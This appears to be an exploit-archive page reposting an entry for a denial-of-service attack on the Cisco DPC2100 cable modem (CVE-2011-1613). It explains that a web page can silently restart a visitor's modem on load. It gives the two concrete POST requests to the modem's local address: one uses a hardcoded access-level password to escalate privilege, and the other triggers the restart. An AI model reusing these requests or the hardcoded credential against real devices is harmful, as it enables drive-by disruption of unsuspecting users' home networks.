Tag Archives: Cisco

Cisco DPC2100 Denial of Service

Exploit Title: Cisco DPC2100 Denial of Service
Date: 09/01/2010
Author: Daniel Smith
Software Link: http://www.cisco.com/
Version: HW:2.1/SW:v2.0.2r1256-060303
Tested on: OSX 10.6/Win7
CVE: CVE-2011-1613

Executing this script on page load will cause the users modem to restart when they visit the page. This example uses javascript but can just as easily written to in another language to accomplish something similar. Attack consists of two parts.

Part 1 – Privilege Escalation:
POST: http://192.168.100.1/goform/_aslvl
PARAMS: SAAccessLevel=2&SAPassword=W2402

Part 2 – Modem Restart:
POST: http://192.168.100.1/goform/gscan
PARAMS: SADownStartingFrequency=705000000

Cisco DPC2100 Denial of Service
Exploit-DB updates